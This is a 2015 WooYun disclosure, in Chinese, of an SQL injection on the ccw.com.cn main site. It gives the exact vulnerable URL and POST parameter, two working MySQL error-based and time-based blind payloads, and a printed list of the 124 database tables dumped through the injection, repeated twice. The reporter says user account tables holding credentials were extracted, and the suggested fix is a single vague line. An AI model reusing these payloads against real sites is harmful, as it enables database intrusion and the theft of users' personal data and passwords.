计世网主站存在sql注入漏洞泄露用户信息（含大量账号密码）

发表于 2015年07月20日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0127819

漏洞标题：计世网主站存在sql注入漏洞泄露用户信息（含大量账号密码）

漏洞详情

披露状态：

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-25: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

计世网主站存sql注入漏洞

详细说明：

计世网主站存sql注入漏洞，可脱库，可获取所有用户信息

漏洞证明：

首先是注入点：http://www.ccw.com.cn/space/eyan_more/11550 post:page=2&pagesize=20

Parameter: pagesize (POST)<br>
    Type: error-based<br>
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)<br>
    Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(6581,CONCAT(0x5c,0x71626b6a71,(SELECT (CASE WHEN (6581=6581) THEN 1 ELSE 0 END)),0x71786b7171)),1)Type: AND/OR time-based blind<br>
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)<br>
    Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(8607,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x76445476))))),1)

Parameter: pagesize (POST)

Type: error-based

Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)

Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(6581,CONCAT(0x5c,0x71626b6a71,(SELECT (CASE WHEN (6581=6581) THEN 1 ELSE 0 END)),0x71786b7171)),1)Type: AND/OR time-based blind

Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)

Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(8607,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x76445476))))),1)

通过注入可以跑出数据库信息

可查看数据库

跑出itjia库中的124个表

+-----------------------+<br>
| appinfo               |<br>
| auth_codes            |<br>
| dalao                 |<br>
| ex_applycio           |<br>
| ex_arbor              |<br>
| ex_attachment         |<br>
| ex_bchy               |<br>
| ex_buchonghangye      |<br>
| ex_ca2014             |<br>
| ex_caexpo             |<br>
| ex_card               |<br>
| ex_card_group         |<br>
| ex_card_ship          |<br>
| ex_cardrefuse_ship    |<br>
| ex_ccw_index_focus    |<br>
| ex_cioforum           |<br>
| ex_cioforum2013       |<br>
| ex_ciopw              |<br>
| ex_ciopx2012          |<br>
| ex_ciotp              |<br>
| ex_cisco              |<br>
| ex_citrix             |<br>
| ex_city               |<br>
| ex_collection         |<br>
| ex_collection_group   |<br>
| ex_comment            |<br>
| ex_community          |<br>
| ex_dmf2013            |<br>
| ex_edm                |<br>
| ex_emc                |<br>
| ex_emc_feedback       |<br>
| ex_emc_user           |<br>
| ex_emcbiao            |<br>
| ex_emcuser            |<br>
| ex_emcverify          |<br>
| ex_event              |<br>
| ex_event_user         |<br>
| ex_eyan               |<br>
| ex_eyanip             |<br>
| ex_haocio_comment     |<br>
| ex_huawei             |<br>
| ex_huaweiuser         |<br>
| ex_ibm                |<br>
| ex_intel              |<br>
| ex_it2013             |<br>
| ex_itjiaodian4        |<br>
| ex_jiaodian5          |<br>
| ex_jiaodian_base      |<br>
| ex_jp                 |<br>
| ex_letter_status      |<br>
| ex_live               |<br>
| ex_live_comment       |<br>
| ex_live_content       |<br>
| ex_meeting            |<br>
| ex_meeting_access     |<br>
| ex_meeting_ad         |<br>
| ex_meeting_apply      |<br>
| ex_meeting_comment    |<br>
| ex_meeting_file       |<br>
| ex_meeting_position   |<br>
| ex_meeting_reply      |<br>
| ex_meeting_user       |<br>
| ex_meeting_video      |<br>
| ex_member             |<br>
| ex_message            |<br>
| ex_minisite           |<br>
| ex_noteset            |<br>
| ex_offline_huigu      |<br>
| ex_offline_lianxi     |<br>
| ex_offline_menpiao    |<br>
| ex_offline_news       |<br>
| ex_offline_richeng    |<br>
| ex_offline_zanzhu     |<br>
| ex_offline_zuzhi      |<br>
| ex_online_bmb         |<br>
| ex_online_bmbfield    |<br>
| ex_online_jiabin      |<br>
| ex_online_jiangpin    |<br>
| ex_online_zhuchi      |<br>
| ex_onwall             |<br>
| ex_pro_tag            |<br>
| ex_recommend          |<br>
| ex_release            |<br>
| ex_reply              |<br>
| ex_role               |<br>
| ex_rsa                |<br>
| ex_setting            |<br>
| ex_shouye             |<br>
| ex_shouye2show        |<br>
| ex_snw2014            |<br>
| ex_snw2014_tech       |<br>
| ex_special            |<br>
| ex_special_comment    |<br>
| ex_special_eyanlist   |<br>
| ex_special_report     |<br>
| ex_subscribe_cio      |<br>
| ex_subscribe_man      |<br>
| ex_subscribe_tag      |<br>
| ex_system_tag         |<br>
| ex_tag                |<br>
| ex_tag_relation       |<br>
| ex_trade              |<br>
| ex_tuwenlive          |<br>
| ex_tvforum            |<br>
| ex_tvrelease          |<br>
| ex_user               |<br>
| ex_user_chengjiu      |<br>
| ex_user_cominfo       |<br>
| ex_user_company       |<br>
| ex_user_education     |<br>
| ex_user_menu          |<br>
| ex_user_privacy       |<br>
| ex_user_profile       |<br>
| ex_user_role          |<br>
| ex_user_role_menu     |<br>
| ex_user_status        |<br>
| ex_user_weibo         |<br>
| ex_video              |<br>
| ex_videointerview_old |<br>
| ex_weight_tag         |<br>
| ex_yaoqing            |<br>
| ex_ztsafe             |<br>
| tokens                |<br>
| zhongjiang            |<br>
+-----------------------+

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

+-----------------------+

| appinfo |

| auth_codes |

| dalao |

| ex_applycio |

| ex_arbor |

| ex_attachment |

| ex_bchy |

| ex_buchonghangye |

| ex_ca2014 |

| ex_caexpo |

| ex_card |

| ex_card_group |

| ex_card_ship |

| ex_cardrefuse_ship |

| ex_ccw_index_focus |

| ex_cioforum |

| ex_cioforum2013 |

| ex_ciopw |

| ex_ciopx2012 |

| ex_ciotp |

| ex_cisco |

| ex_citrix |

| ex_city |

| ex_collection |

| ex_collection_group |

| ex_comment |

| ex_community |

| ex_dmf2013 |

| ex_edm |

| ex_emc |

| ex_emc_feedback |

| ex_emc_user |

| ex_emcbiao |

| ex_emcuser |

| ex_emcverify |

| ex_event |

| ex_event_user |

| ex_eyan |

| ex_eyanip |

| ex_haocio_comment |

| ex_huawei |

| ex_huaweiuser |

| ex_ibm |

| ex_intel |

| ex_it2013 |

| ex_itjiaodian4 |

| ex_jiaodian5 |

| ex_jiaodian_base |

| ex_jp |

| ex_letter_status |

| ex_live |

| ex_live_comment |

| ex_live_content |

| ex_meeting |

| ex_meeting_access |

| ex_meeting_ad |

| ex_meeting_apply |

| ex_meeting_comment |

| ex_meeting_file |

| ex_meeting_position |

| ex_meeting_reply |

| ex_meeting_user |

| ex_meeting_video |

| ex_member |

| ex_message |

| ex_minisite |

| ex_noteset |

| ex_offline_huigu |

| ex_offline_lianxi |

| ex_offline_menpiao |

| ex_offline_news |

| ex_offline_richeng |

| ex_offline_zanzhu |

| ex_offline_zuzhi |

| ex_online_bmb |

| ex_online_bmbfield |

| ex_online_jiabin |

| ex_online_jiangpin |

| ex_online_zhuchi |

| ex_onwall |

| ex_pro_tag |

| ex_recommend |

| ex_release |

| ex_reply |

| ex_role |

| ex_rsa |

| ex_setting |

| ex_shouye |

| ex_shouye2show |

| ex_snw2014 |

| ex_snw2014_tech |

| ex_special |

| ex_special_comment |

| ex_special_eyanlist |

| ex_special_report |

| ex_subscribe_cio |

| ex_subscribe_man |

| ex_subscribe_tag |

| ex_system_tag |

| ex_tag |

| ex_tag_relation |

| ex_trade |

| ex_tuwenlive |

| ex_tvforum |

| ex_tvrelease |

| ex_user |

| ex_user_chengjiu |

| ex_user_cominfo |

| ex_user_company |

| ex_user_education |

| ex_user_menu |

| ex_user_privacy |

| ex_user_profile |

| ex_user_role |

| ex_user_role_menu |

| ex_user_status |

| ex_user_weibo |

| ex_video |

| ex_videointerview_old |

| ex_weight_tag |

| ex_yaoqing |

| ex_ztsafe |

| tokens |

| zhongjiang |

+-----------------------+

跑了一下ex_user表和ex_member表中的数据

修复方案：

做好过滤

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-07-2511:42

厂商回复：

漏洞Rank：15 (WooYun评价)

评价

原文连接：计世网主站存在sql注入漏洞泄露用户信息（含大量账号密码） 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。